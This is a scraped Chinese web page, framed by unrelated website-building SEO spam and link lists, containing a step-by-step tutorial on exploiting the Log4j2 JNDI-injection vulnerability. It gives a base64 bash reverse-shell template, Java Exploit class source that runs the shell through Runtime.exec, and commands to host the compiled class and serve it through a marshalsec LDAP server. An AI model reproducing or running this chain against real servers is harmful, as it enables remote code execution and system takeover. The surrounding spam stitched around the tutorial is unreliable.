当前位置: 首页 > news >正文

广州微网站建设市场抖音代运营广州

广州微网站建设市场,抖音代运营广州,企业网站需要什么,php开源企业网站log4j2漏洞复现 漏洞原理 log4j2框架下的lookup查询服务提供了{}字段解析功能#xff0c;传进去的值会被直接解析。例如${sys:java.version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制#xff0c;就有可能让查询指向任何服务#xff08;可能是攻击者部署…log4j2漏洞复现 漏洞原理 log4j2框架下的lookup查询服务提供了{}字段解析功能传进去的值会被直接解析。例如${sys:java.version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制就有可能让查询指向任何服务可能是攻击者部署好的恶意代码。 攻击者可以利用这一点进行JNDI注入使得受害者请求远程服务来链接本地对象在lookup的{}里面构造payload调用JNDI服务LDAP向攻击者提前部署好的恶意站点获取恶意的.class对象造成了远程代码执行可反弹shell到指定服务器。 dnslog验证跳过,直接进入反弹shell步骤 一、使用JNDI-exploit工具一键化反弹shell 命令格式 bash -c {echo,BASE64编码命令}|{base64,-d}|{bash,-i}在线编码网站 JNDI-Exploit工具搭建JNDI服务器 传参执行 反弹成功 二、使用EXP代码反弹shell 1、先写个java反弹shell的exp。 import java.lang.Runtime; import java.lang.Process; public class Exploit {public Exploit(){try{Runtime.getRuntime().exec(/bin/bash -c {echo,base64命令}|{base64,-d}|{bash,-i});}catch(Exception e){e.printStackTrace();}}public static void main(String[] argv){Exploit e new Exploit();} }3、编译为class javac Exploit.java4、搭建web服务将class放上去 我直接python搭建个临时的 python3 -m http.server 44555、搭建LADP服务 使用marshalsec工具快速搭建 java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://刚才http服务的地址:端口号/#Exploit 13896、反弹shell 传参、开启监听
http://www.zqtcl.cn/news/141753/

相关文章:

  • 一个网站做3个关键词够找人建设一个网站多少钱
  • 网站群软件阿里云虚拟主机wordpress
  • 自己做个网站要多少钱温州网站开发平台
  • 北京鑫创网站建设找个网站你知道的
  • 做网站找客户电子商务网站开发与管理
  • 宝安高端网站设计怎么样qq钓鱼网站怎么制作
  • 学习教建网站公众号小程序怎么注销
  • 网站建设或网站优化排名做建筑设计网站
  • 外贸seo外贸推广外贸网站建设外贸网站建设用图片设置网站首页
  • 网站模板安装出入成都通知今天
  • wordpress网站 添加微信网站设计O2O平台佛山总代理
  • 广州网站开发定制方案网站建设应该考虑哪些方面
  • 在线网站建设培训门户类网站图片
  • 佛山乐从网站建设自媒体平台收益排行榜
  • 网站建设项目需求陕西陕煤建设集团有限公司网站
  • 鼓楼网站开发永州做网站tuantaogou
  • ui网站建设站评价文山建设5G网站
  • 深圳 网站设计公司企业网络搭建教程
  • 做网站策划遇到的问题全网营销型网站模版
  • 网站建设费属于无形资产吗广州高铁新建站在哪里
  • 网站建设平台报价深圳市房产交易中心官网
  • 注册网站网前端素材网
  • 快3网站制作 优帮云贾汪区建设局网站
  • 南昌市有帮做网站的吗网站联动
  • 英文网站建设服务合同模板网站详情页艺术字怎么做的
  • discuz仿搜索网站做网站开发用哪种语言好
  • 企业网站服务网络设备维护是做什么的
  • 罗湖网站公司网站服务器建设合同
  • 公司网站设计注意什么免费名字设计成图案
  • python3 网站建设济南网站建设(选 聚搜网络)